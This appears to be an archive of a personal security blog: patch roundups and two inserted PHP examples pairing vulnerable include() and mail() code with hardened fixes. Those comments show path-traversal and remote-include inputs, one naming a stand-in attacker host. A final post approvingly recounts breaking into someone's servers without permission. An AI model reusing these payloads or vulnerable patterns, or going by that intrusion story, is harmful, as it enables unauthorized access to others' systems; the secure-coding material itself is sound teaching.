str[bits]

April 30, 2002

The Biggest Security Threat

Filed under: Security

BBC News is reporting that the employees of a company pose the biggest threat to security.

“Digital cameras, MP3 players and handheld computers could be the tools that disgruntled UK employees use to sabotage computer systems or steal vital data, warn security experts. The removable memory cards inside the devices could be used to bring in software that looks for vulnerabilities on a company’s internal network. The innocent-looking devices could also be used to smuggle out confidential or sensitive information.”

For me this is not a new thing. In my own experience, here in my present company, every day is like a crusade in educating employees and implementing security, and it is frustrating sometimes how slowly they are accepting issues like these.

July 13, 2001

Friday the 13th Security Fix

Filed under: Security, Work-a-Work

Good early morning, here’s my “Friday the 13th Security Fix”.

Microsoft released yet another patch, this one fixing a mail relay issue in all installations of Windows 2000 Server and Advanced Server as well as in some configurations of Windows 2000 Professional. Not a huge bug, but it could let unauthorized people send e-mail through the server, and we don’t want to help the spammers now, do we?
[FAQ and Patch]

A vulnerability has been found in Check Point FireWall-1 and VPN-1 version 4.1 that would allow a remote attacker to pass arbitrary UDP packets through the firewall by prefixing them with a particular malformed RDP header. RDP here is Check Point’s own Reliable Data Protocol (UDP port 259), not Microsoft’s Remote Desktop Protocol; the default rule base lets RDP traffic through implicitly, which is why the crafted header is enough to bypass the policy.
[FAQ and Patch]

Linux Mandrake has released updated fetchmail packages that fix a buffer overflow in fetchmail’s handling of large mail headers.
[Updated RPM]

Caldera Linux has released updated Webmin packages that fix a vulnerability that left authentication data in the server’s environment variables.
[Updated RPM]

Caldera also released updated OpenSSH packages that fix the vulnerability known as “OpenSSH ‘cookie’ file deletion”.
[Updated RPM]

RedHat Linux has released an advisory indicating a buffer overflow in the xloadimage/faces reader, which is called from the Netscape ‘plugger’ plugin. It’s possible for malicious Web sites to execute arbitrary code on a user’s system if they have installed various packages from the RedHat Powertools version 6.2 collection.
[Updated RPM]

A recent advisory indicates a problem in poprelayd’s handling of log messages generated by qpop, which could allow a remote attacker to bypass the authentication mechanism needed to relay mail through the target system. Cobalt/Sun has confirmed this vulnerability. An updated version is available now.

phpPgAdmin CGI versions prior to 2.3 have been found to contain a vulnerability that could allow a remote attacker to view files readable by the Web server’s uid. Combined with several possible tricks to upload valid PHP code onto the Web server, this could allow a remote attacker to execute arbitrary PHP code on the server as well. The vendor has confirmed this vulnerability and released version 2.3, which is available here.

The SquirrelMail PHP application versions 1.0.4 and prior make insecure calls to the PHP include() function. A remote attacker can execute arbitrary commands (and PHP code) on the remote Web server with the permissions of the Web server user, typically ‘nobody.’ The vendor has confirmed this vulnerability and released a patch, which is available here.
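Both the phpPgAdmin file-disclosure item and the SquirrelMail include() item above come from the same root cause: a request value ends up as part of a filesystem path handed to include() or a file-reading function. The following is an added example (PHP 7+ syntax), not code from SquirrelMail or phpPgAdmin; the `page` parameter, the `pages/` directory and the allowlist contents are assumed for illustration. It shows the vulnerable shape beside two hardened resolvers: a fixed allowlist, and a realpath() containment check for cases where names really must be dynamic.

```php
<?php
// Added example (PHP 7+), not code from SquirrelMail or phpPgAdmin.
// Assumed scenario: the application lets the request choose which page to
// include, e.g.  /index.php?page=compose  ->  include('pages/compose.php').

// VULNERABLE: the request value becomes part of the include() path.
// ?page=../../../../etc/passwd%00 discloses any file the web server uid can
// read (the NUL byte truncated the '.php' suffix on PHP versions of the
// time), and with allow_url_fopen on, ?page=http://attacker.example/x
// fetches and runs attacker-supplied PHP as the web server user.
function load_page_vulnerable(string $page): void
{
    include 'pages/' . $page . '.php';   // attacker controls the path
}

// HARDENED, layer 1: map the request value onto a fixed allowlist and never
// touch the filesystem with user-supplied path components.
const PAGES = [
    'compose' => 'pages/compose.php',
    'folders' => 'pages/folders.php',
];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;
}

// HARDENED, layer 2, for genuinely dynamic names (plugins dropped into a
// directory): accept only a short identifier, then prove the resolved path
// still lies inside the intended directory. realpath() collapses '..' and
// symlinks and returns false for files that do not exist.
function resolve_dynamic(string $name, string $baseDir): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

function load_page_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        exit('unknown page');
    }
    include $file;
}

// Demonstration with constructed request values (run from the CLI).
foreach (['compose', '../../../../etc/passwd', 'http://attacker.example/x'] as $p) {
    printf("%-28s -> %s\n", $p, resolve_page($p) ?? 'REJECTED');
}
```

The allowlist is the real fix; the realpath() check is defence in depth for the cases an allowlist cannot cover, and it deliberately rejects anything that does not exist on disk rather than falling back to string matching.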

That’s all for today from my collection of the latest security alerts and available patches. I hope this helps inform the people concerned, especially network and systems admins, to upgrade their systems. Remember: security is not an option… it’s a must!

Take care everyone. Today could be your unlucky day? Read this and this.

Enjoy a worry-free day today.

July 6, 2001

Late Night Security Readings

Filed under: Security

Cisco was bitten by two bugs this week: a problem with its SSH implementation {01.27.001} and another with its on-board HTTP servers {01.27.008}. These vulnerabilities should serve as a reminder that infrastructure equipment needs patching and lock-down attention just as operating systems do. Security-savvy network administrators who had already shut down the HTTP service on their Cisco devices (“no ip http server” on IOS) proactively avoided this latest round of HTTP-based vulnerabilities.

While organizations should still upgrade their vulnerable IOS and CatOS images, proactive lock-down efforts can definitely reduce potential risks. It’s time to re-embrace some age-old wisdom: “If you aren’t using it, turn it off.”

+ + +

Oracle 8i Standard and Enterprise Editions versions 8.1.5, 8.1.6 and 8.1.7 as well as all previous versions for Windows, Linux, Solaris, AIX, HP-UX and Tru64 Unix are vulnerable to a remote denial of service attack against the TNS libraries that handle the various Oracle TNS services. The attacker does not need valid authentication credentials to mount an attack.

Oracle has confirmed this problem and produced a patch (under bug number 1656431), which is available at: http://metalink.oracle.com/

+ + +

Lotus Domino server version 5.0.6 has been found vulnerable to a Cross-Site Scripting attack. This potentially allows a malicious e-mail or Web site to execute active scripting in a user’s browser via the vulnerable Domino site.

+ + +

An advisory indicates that a feature added to the mail() function in PHP 4.0.5, an extra parameter whose contents are appended to the command line of the mail transport program, may allow an attacker who has Web page authoring permissions to bypass PHP’s safe mode and execute arbitrary commands. This is a concern for ISPs and virtual Web hosting providers.
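To make the mail() item concrete, here is an added example that is not code from the advisory or from PHP itself. It assumes a hypothetical form field `bounce` that the application wants to turn into the envelope sender (sendmail’s -f option), and shows why letting that field reach the fifth argument unchanged is an argument-injection sink, beside a version that builds the argument itself from a validated address.

```php
<?php
// Added example, not code from the advisory or from PHP itself.
// mail()'s optional fifth argument is appended to the command line of the
// configured mail transport program (sendmail_path), so anything a user can
// put there is an argument-injection sink. Assumed scenario: a form field
// 'bounce' is meant to set the envelope sender (sendmail's -f option).

// VULNERABLE: the form field reaches the transport program's argv unchanged,
// so whoever controls the value can hand the program arbitrary options.
function send_vulnerable(string $to, string $body, string $bounce): bool
{
    return mail($to, 'Hello', $body, "From: app@example.com\r\n", $bounce);
}

// HARDENED: the application builds the extra argument itself from a value
// checked to be a plain address; the caller never supplies flags.
function envelope_flag(string $addr): ?string
{
    $addr = trim($addr);
    if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return null;                      // not an address at all
    }
    if ($addr[0] === '-' || preg_match('/[\s"\'\\\\]/', $addr)) {
        return null;                      // option-like or shell-significant
    }
    return '-f' . $addr;                  // no space: stays one argv entry
}

function send_hardened(string $to, string $body, string $bounce): bool
{
    $flag = envelope_flag($bounce);
    if ($flag === null) {
        return false;                     // refuse rather than guess
    }
    return mail($to, 'Hello', $body, "From: app@example.com\r\n", $flag);
}

// Demonstration with constructed inputs (no mail is sent).
foreach (['bounces@example.com', '--not-an-address', 'a@b.example -x'] as $v) {
    printf("%-26s -> %s\n", $v, envelope_flag($v) ?? 'REJECTED');
}
```

On a shared host the safer policy is simpler still: never pass the fifth argument from request data at all, and let the transport program's own configuration decide the envelope sender.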

August 2, 2000

Hacking Time

Yesterday I was pretty bored, feeling sleepy and unproductive. I tried to divert myself by trying something *divine*. I got into one of my beloved networks (I’ll not give the details, to protect them, until they fix the security holes), and I was really surprised that they have only very minimal security. Without any sweat on my fingers, I was able to log in to their core servers, and even to some of their clients. This is really very, very, very bad, and I don’t believe it. I could even alter the web pages on their web site and get the root account of their mail server – but I didn’t do it.

I sent an email to the appropriate person in that domain, informing them of the lack of security, and also left a message on the server addressed to the administrator.

Hopefully they will take the necessary action ASAP to protect themselves from crackers (unreal hackers), because others are more capable than I am at what I did, and they can do unimaginable damage.

I didn’t touch anything in that domain; I only left a message for the administrator on one server and gave them friendly advice. Nothing more, believe me.
